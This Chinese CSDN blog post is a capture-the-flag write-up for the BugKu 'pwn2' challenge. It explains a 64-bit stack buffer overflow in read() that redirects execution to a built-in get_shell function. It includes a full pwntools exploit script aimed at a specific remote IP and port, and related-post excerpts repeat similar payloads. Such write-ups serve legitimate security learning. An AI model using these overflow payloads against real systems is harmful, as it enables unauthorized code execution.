BugKu - pwn2

最新推荐文章于 2024-02-17 22:20:32 发布
最新推荐文章于 2024-02-17 22:20:32 发布
阅读量3.6k 收藏 7
点赞数 5
分类专栏: pwn学习 文章标签: bugku pwn2 bugku pwn2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/casuall/article/details/94834152
版权

这道题来自于bugku旧平台的第二道pwn题,还是比较简单的,一个典型的缓冲区溢出题。

首先查看一下文件类型,file pwn2,可以看到是64位的程序。然后用64位IDA打开,查看程序的逻辑。

pwn2-1.png

可以看到这个程序的逻辑比较简单,有一个read函数,这个函数一个危险函数,可能引发缓冲区溢出漏洞。常见的危险函数还有getsstrcpysprintfscanf等。

然后查看字符串,看看是否有内置的后门。

pwn2-4.png

如图所示,有个cat flag的字符串,找到引用他的地方。

pwn2-5.png

发现了一个get_shell函数,我们只需要对buffer进行溢出,控制跳转,跳转到get_shell函数的地址就能够获取flag了。

我们查看一下保护措施,看到并没有开启PIE,也就是地址随机化,所以可以直接用找到的地址。

pwn2-2.png

首先用pwndbg找到buffer的地址,算出偏移。

pwn2-6.png

read函数那下个断点,然后跟进去,由于这是个64位的程序,他的参数依次保存在rdirsirdxrcxr8r9中。所以rdi为0,rsi为buffer的地址,rdx为0x100。

我们用RBP-RSI+8就能得到偏移地址,注意64位程序下的rbp占8个字节,所以后面要加上8。还有就是对地址进行打包的时候同样是64位格式的,用p64()而不是p32()
如果对于栈溢出的原理不是很理解的,可以去看一下我之前pwnable.kr - bof 那篇文章,这里就不多赘述了。
pwn2-0.png

源码如下:

from pwn import *

context.log_level = 'debug'

# conn = process('./pwn2')
conn = remote('114.116.54.89',10003)

shell_addr = 0x0000000000400751

conn.recvuntil('say something?')

buf_addr =  0x7fffffffe580 
RBP = 0x7fffffffe5b0 

payload = 'A' * (RBP-buf_addr+0x8) + p64(shell_addr)

conn.sendline(payload)

conn.interactive()
Casuall
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugkupwn2的write up
darui_csdn的博客
09-06 349
bugkupwn2的write up**最后效果如下:** 作为一个初出茅庐的菜鸟,做几个简单的pwn题练一下,正好学一下基础知识。 首先来看这道题,checksec一下,我们发现,没有打开什么保护。 运行一下,看看需要在哪里插入payload。 注意这里需要先赋予运行权限,笔者作为新手犯了几次错误。 把程序放进IDA中看一下套路流程。 我们在read函数这里可以使程序溢出。也看到ebp...
BugkuCTF-PWN题pwn2-overflow超详细讲解
am_03的博客
08-30 1855
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
BugKu---树木的小秘密逆向题解
m0_63581842的博客
02-17 1146
注意要装好Python,我装了python,没配置环境导致输入python pyinstxtractor.py easy_reverse.exe 运行不出来。Uncompyle6,是一个Python原生的跨版本反编译器,是decompyle, uncompyle, uncompyle2的后继版本。在cmd中,输入 dir /b 知道在easy_reverse.exe_extracted文件夹下面的文件,可以很显眼地看到123这个文件。可以看到很多Py的,猜测打包成exe文件之前就是python写的。
[Bugku CTF——Pwn] pwn2
Y_peak的博客
03-22 272
[Bugku CTF——Pwn] pwn2 题目地址:https://ctf.bugku.com/ 额,好久不写这么简单的题目了 利用栈溢出修改返回地址就好, 如果不会就去看看什么是栈溢出 exploit from pwn import * p = remote('114.67.246.176',11431) get_shell = 0x0000000000400751 payload = 'a' * (0x30 + 8) + p64(get_shell) p.send(payload) p.inter
ctf.bugku ctf题目详解——pwn2
yeshen4328的专栏
05-26 1099
ctf.bugku ctf题目详解——pwn2 题目 程序分配了一个栈上的变量s,长度为0x30,并一开始置0. 9行开始从外部读取0x100的数据到s中,由此可见此处存在一个栈溢出。 同时使用ida打开程序之后发现还存在一个get_shell的函数: 于是我们需要想方法利用溢出来调用这个get_shell函数。 x64函数调用规则 解题之前我们先学习下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e
BugKu做题记录【pwn】(持续更新中)
Assassin
04-06 3031
文章目录repeater1.题目分析2.我的错误思路3.正确思路4.利用代码5.知识点总结 好久不做题了,刚刚开始的签到题就做了三天,感觉水平确实下降得太厉害了,恢复训练~ ** ** repeater 1.题目分析 题目逻辑非常简单,就是read函数输入内容,然后printf输出,经过观察和简单得调试,我们需要注意到几个内容 pinrtf存在格式化字符串漏洞 read长度为0x64,不足以造成栈溢出 经过权限查询发现开启了NX保护,RELRO是部分开启,也就是堆栈不可执行 经过查看,bss段不可执
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
Bugku——瑞士军刀——pwn
2301_77163106的博客
08-20 251
我们可以很清楚看到有flag文件,进行抓取使用命令cat 相应文件--->cat flag,得到flag。回车并输入查找命令ls(可以了解一些其他的==>接下来我们只要访问他就行了打开kali进入终端。进入终端窗口输入 nc ip 端口。点击进入(也可以点击鼠标右键)题目给我们 nc ip 端口。
bugku—进制转换
m0_62018355的博客
03-20 935
首先观察题目--进制转换 在我们购买下载附件后会得到一段二进制、八进制、十进制和十六进制组成的混乱文本 我们根据进制转换的原则和书写规则可以知道 1.二进位计数制仅用两个数码即0和1。开头为b的即为二进制,为什么要用b来表示二进制呢?因为二进制的英文是:binary。用它的第一个字母表示,所以是B。 2.根据以上规律,又知二进制 Binary、八进制 Octal、十进制 Decimal、十六进制 Hex,上面乱码前的字母即代表了其要用到的转换进制,所以我们若要得到携带有“flag”四个字母的..
bugku-进制转换】
weixin_52576029的博客
02-24 943
bugku-进制转换功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 根据题目提示得知该密文是由 二进制 八进制 十进制 十六进制 组合的编码 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编
bugku 里面的五个pwn题wp
qq_36495104的博客
05-08 2083
pwn1 没给二进制文件,直接nc过去就能拿shell,查看flag,flag{6979d853add353c9} pwn2 查看保护,发现什么保护都没开启 ida反编译查看 明显栈溢出,还注意到有后门函数 只需要劫持函数的返回地址到get_shell函数,就可以用拿到flag。使用gdb调试发现,在0x38个字符后就会覆盖返回地址,所以编写脚本拿flag。 exp #pwn2.py from pwn import * #sh=process('./pwn2') sh=remote('11
bugku pwn2
doudoudedi
06-04 1685
这道题是一道简单的栈溢出 直接用IDA查看 很明显的得到flag的函数 直接上exp from pwn import * p=remote('114.116.54.89',10003) p.recvuntil('something?') payload='a'*56+p64(0x400751) p.sendline(payload) p.interactive() ...
bugku pwn2学习心得以及wp
欢迎来到神林的博客
08-25 599
拿到题目: file查看一下文件类型,可以看到 x86-64,以及 dynamically linked,所以 64位,动态连接的。 查看一下有没有开什么保护机制: 嘛都没开,直接放到64位IDA里面看一看。 看到敏感名称函数“getshell” 感觉能直接拿flag,方法就是找到一个地方跳转到getshell函数地址,查看一下地址为:0x400715 转手看main函数: 其中有一个re...
bugku-pwn2-wp
weixin_45427676的博客
04-05 330
下载完题后先在VM中checksec查看保护机制 基本没有开什么保护,可以知道文件是64位的,用64位IDA打开,按F5键反汇编一下,看一下main函数 可以发现read()函数存在栈溢出漏洞,缓冲区s的大小为0x30,而read()函数指向缓冲区中读入0x100大小的数据,所以造成栈溢出。 在main函数下面有一个get_shell_()函数,打开看一下 有一个system(“cat fl...
Bugku pwn2
、moddemod
05-26 424
pwn2 题目 chmod +x pwn2 这里都关闭了,栈上可执行! 这个程序里面直接留了后门get_shell_ 思路,输入的数据超过0x30栈空间大小,将get_shell_地址覆盖调用main函数的返回地址即可, 即b'm' * (0x30 + 8) + p64(0x400751),这里加上8是因为push了rbp,即8个字节大小 exp from pwn import * p = remote('114.116.54.89', '10003') payload = b'a' * (0x
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值